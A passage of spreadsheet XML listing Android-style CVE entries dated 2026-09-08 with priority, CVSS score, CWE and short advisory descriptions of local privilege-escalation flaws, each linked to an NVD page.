      <c r="A2021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28593</t>
        </is>
      </c>
      <c r="C2021" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2021" s="5" t="inlineStr"/>
      <c r="F2021" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2021" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2021" s="5" t="inlineStr"/>
      <c r="I2021" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2021" s="5" t="inlineStr"/>
      <c r="K2021" s="5" t="inlineStr">
        <is>
          <t>CWE-356</t>
        </is>
      </c>
      <c r="L2021" s="5" t="inlineStr">
        <is>
          <t>In getItemList of SettingsFragment.java, there is a possible user interaction bypass due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t>
        </is>
      </c>
    </row>
    <row r="2022">
      <c r="A2022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28594</t>
        </is>
      </c>
      <c r="C2022" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2022" s="5" t="inlineStr"/>
      <c r="F2022" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2022" s="5" t="inlineStr"/>
      <c r="H2022" s="5" t="inlineStr"/>
      <c r="I2022" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2022" s="5" t="inlineStr"/>
      <c r="K2022" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2022" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t>
        </is>
      </c>
    </row>
    <row r="2023">
      <c r="A2023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28599</t>
        </is>
      </c>
      <c r="C2023" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2023" s="5" t="inlineStr"/>
      <c r="F2023" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2023" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2023" s="5" t="inlineStr"/>
      <c r="I2023" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2023" s="5" t="inlineStr"/>
      <c r="K2023" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2023" s="5" t="inlineStr">
        <is>
          <t>In addCreatorToken of ActivityManagerService.java, there is a possible Intent Redirection Bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t>
        </is>
      </c>
    </row>
    <row r="2024">
      <c r="A2024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28600</t>
        </is>
      </c>
      <c r="C2024" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2024" s="5" t="inlineStr"/>
      <c r="F2024" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2024" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2024" s="5" t="inlineStr"/>
      <c r="I2024" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2024" s="5" t="inlineStr"/>
      <c r="K2024" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2024" s="5" t="inlineStr">
        <is>
          <t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change default payment app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t>
        </is>
      </c>
    </row>
    <row r="2025">
      <c r="A2025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28602</t>
        </is>
      </c>
      <c r="C2025" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2025" s="5" t="inlineStr"/>
      <c r="F2025" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2025" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2025" s="5" t="inlineStr"/>
      <c r="I2025" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2025" s="5" t="inlineStr"/>
      <c r="K2025" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2025" s="5" t="inlineStr">
        <is>
          <t>In setClipboardAccessNotificationsEnabledForUser of ClipboardService.java, there is a possible mult-iuser isolation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t>
        </is>
      </c>
    </row>
    <row r="2026">
      <c r="A2026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28603</t>
        </is>
      </c>
      <c r="C2026" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2026" s="5" t="inlineStr"/>
      <c r="F2026" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2026" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2026" s="5" t="inlineStr"/>
      <c r="I2026" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2026" s="5" t="inlineStr"/>
      <c r="K2026" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2026" s="5" t="inlineStr">
        <is>
          <t>In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible read/write access to private files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t>
        </is>
      </c>
    </row>
    <row r="2027">
      <c r="A2027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28607</t>
        </is>
      </c>
      <c r="C2027" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2027" s="5" t="inlineStr"/>
      <c r="F2027" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2027" s="5" t="inlineStr"/>
      <c r="H2027" s="5" t="inlineStr"/>
      <c r="I2027" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2027" s="5" t="inlineStr"/>
      <c r="K2027" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2027" s="5" t="inlineStr">
        <is>
          <t>In multiple functions in multiple locations, there is a possible background activity launch bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t>
        </is>
      </c>
    </row>
    <row r="2028">
      <c r="A2028" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28611</t>
        </is>
      </c>
      <c r="C2028" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2028" s="5" t="inlineStr"/>
      <c r="F2028" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2028" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2028" s="5" t="inlineStr"/>
      <c r="I2028" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2028" s="5" t="inlineStr"/>
      <c r="K2028" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2028" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of NfcService.java, there is a possible silent payment session hijacking enablement due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t>
        </is>
      </c>
    </row>
    <row r="2029">
      <c r="A2029" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28612</t>
        </is>
      </c>
      <c r="C2029" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2029" s="5" t="inlineStr"/>
      <c r="F2029" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2029" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2029" s="5" t="inlineStr"/>
      <c r="I2029" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2029" s="5" t="inlineStr"/>
      <c r="K2029" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2029" s="5" t="inlineStr">
        <is>
          <t>In resolveActivity of ActivityStarter.java, there is a possible way to perform Intent Redirection attacks due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t>
        </is>
      </c>
    </row>
    <row r="2030">
      <c r="A2030" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28614</t>
        </is>
      </c>
      <c r="C2030" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2030" s="5" t="inlineStr"/>
      <c r="F2030" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2030" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2030" s="5" t="inlineStr"/>
      <c r="I2030" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2030" s="5" t="inlineStr"/>
      <c r="K2030" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2030" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t>
        </is>
      </c>
    </row>
    <row r="2031">
      <c r="A2031" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28616</t>
        </is>
      </c>
      <c r="C2031" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2031" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2031" s="5" t="inlineStr"/>
      <c r="F2031" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2031" s="5" t="inlineStr"/>
      <c r="H2031" s="5" t="inlineStr"/>
      <c r="I2031" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2031" s="5" t="inlineStr"/>
      <c r="K2031" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2031" s="5" t="inlineStr">
        <is>
          <t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t>
        </is>
      </c>
    </row>
    <row r="2032">
      <c r="A2032" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28620</t>
        </is>
      </c>
      <c r="C2032" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2032" s="5" t="inlineStr"/>
      <c r="F2032" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2032" s="5" t="inlineStr"/>
      <c r="H2032" s="5" t="inlineStr"/>
      <c r="I2032" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2032" s="5" t="inlineStr"/>
      <c r="K2032" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2032" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t>
        </is>
      </c>
    </row>
    <row r="2033">
      <c r="A2033" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28624</t>
        </is>
      </c>
      <c r="C2033" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2033" s="5" t="inlineStr"/>
      <c r="F2033" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2033" s="5" t="inlineStr"/>
      <c r="H2033" s="5" t="inlineStr"/>
      <c r="I2033" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2033" s="5" t="inlineStr"/>
      <c r="K2033" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2033" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible read/write access to files without the proper permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t>
        </is>
      </c>
    </row>
    <row r="2034">
      <c r="A2034" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28631</t>
        </is>
      </c>
      <c r="C2034" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2034" s="5" t="inlineStr"/>
      <c r="F2034" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2034" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2034" s="5" t="inlineStr"/>
      <c r="I2034" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2034" s="5" t="inlineStr"/>
      <c r="K2034" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L2034" s="5" t="inlineStr">
        <is>
          <t>In buildMiniResolver of IntentForwarderActivity.java, there is a possible consent bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t>
        </is>
      </c>
    </row>
    <row r="2035">
      <c r="A2035" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28634</t>
        </is>
      </c>
      <c r="C2035" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2035" s="5" t="inlineStr"/>
      <c r="F2035" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2035" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2035" s="5" t="inlineStr"/>
      <c r="I2035" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2035" s="5" t="inlineStr"/>
      <c r="K2035" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2035" s="5" t="inlineStr">
        <is>
          <t>In handleUssdRequest of PhoneInterfaceManager.java, there is a possible way to send a USSD request without permission due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t>
        </is>
      </c>
    </row>
    <row r="2036">
      <c r="A2036" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28636</t>
        </is>
      </c>
      <c r="C2036" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2036" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2036" s="5" t="inlineStr"/>
      <c r="F2036" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2036" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2036" s="5" t="inlineStr"/>
      <c r="I2036" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2036" s="5" t="inlineStr"/>
      <c r="K2036" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2036" s="5" t="inlineStr">
        <is>
          <t>In setupLayout of PickActivity.java, there is a possible bypass of the "Install unknown apps" security restriction due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t>
        </is>
      </c>
    </row>
    <row r="2037">
      <c r="A2037" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28639</t>
        </is>
      </c>
      <c r="C2037" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2037" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2037" s="5" t="inlineStr"/>
      <c r="F2037" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2037" s="5" t="inlineStr"/>
      <c r="H2037" s="5" t="inlineStr"/>
      <c r="I2037" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2037" s="5" t="inlineStr"/>
      <c r="K2037" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2037" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t>
        </is>
      </c>
    </row>
    <row r="2038">
      <c r="A2038" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28642</t>
        </is>
      </c>
      <c r="C2038" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2038" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2038" s="5" t="inlineStr"/>
      <c r="F2038" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2038" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2038" s="5" t="inlineStr"/>
      <c r="I2038" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2038" s="5" t="inlineStr"/>
      <c r="K2038" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2038" s="5" t="inlineStr">
        <is>
          <t>In executeRequest of ActivityStarter.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t>
        </is>
      </c>
    </row>
    <row r="2039">
      <c r="A2039" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28644</t>
        </is>
      </c>
      <c r="C2039" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2039" s="5" t="inlineStr"/>
      <c r="F2039" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2039" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2039" s="5" t="inlineStr"/>
      <c r="I2039" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2039" s="5" t="inlineStr"/>
      <c r="K2039" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2039" s="5" t="inlineStr">
        <is>
          <t>In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t>
        </is>
      </c>
    </row>
    <row r="2040">
      <c r="A2040" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28650</t>
        </is>
      </c>
      <c r="C2040" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2040" s="5" t="inlineStr"/>
      <c r="F2040" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2040" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H2040" s="5" t="inlineStr"/>
      <c r="I2040" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2040" s="5" t="inlineStr"/>
      <c r="K2040" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2040" s="5" t="inlineStr">
        <is>
          <t>In setHiddenWhileSuspended of WindowState.java, there is a possible overlay bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t>
        </is>
      </c>
    </row>
    <row r="2041">
      <c r="A2041" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28653</t>
        </is>
      </c>
      <c r="C2041" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2041" s="5" t="inlineStr"/>
      <c r="F2041" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2041" s="5" t="inlineStr"/>
      <c r="H2041" s="5" t="inlineStr"/>
      <c r="I2041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2041" s="5" t="inlineStr"/>
      <c r="K2041" s="5" t="inlineStr">
        <is>
          <t>CWE-1190, CWE-787</t>
        </is>
      </c>
      <c r="L2041" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t>
        </is>
      </c>
    </row>
    <row r="2042">
      <c r="A2042" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28655</t>
        </is>
      </c>
      <c r="C2042" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2042" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2042" s="5" t="inlineStr"/>
      <c r="F2042" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2042" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2042" s="5" t="inlineStr"/>
      <c r="I2042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2042" s="5" t="inlineStr"/>
      <c r="K2042" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2042" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of RemoteViews.java, there is a possible background activity launch bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t>
        </is>
      </c>
    </row>
    <row r="2043">
      <c r="A2043" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28657</t>
        </is>
      </c>
      <c r="C2043" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2043" s="5" t="inlineStr"/>
      <c r="F2043" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2043" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2043" s="5" t="inlineStr"/>
      <c r="I2043" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2043" s="5" t="inlineStr"/>
      <c r="K2043" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2043" s="5" t="inlineStr">
        <is>
          <t>In onActivityResult of AppWidgetConfigActivityProxy.java, there is a possible unauthorized URI permission grant due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t>
        </is>
      </c>
    </row>
    <row r="2044">
      <c r="A2044" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2044" s="5" t="inlineStr">
        <is>
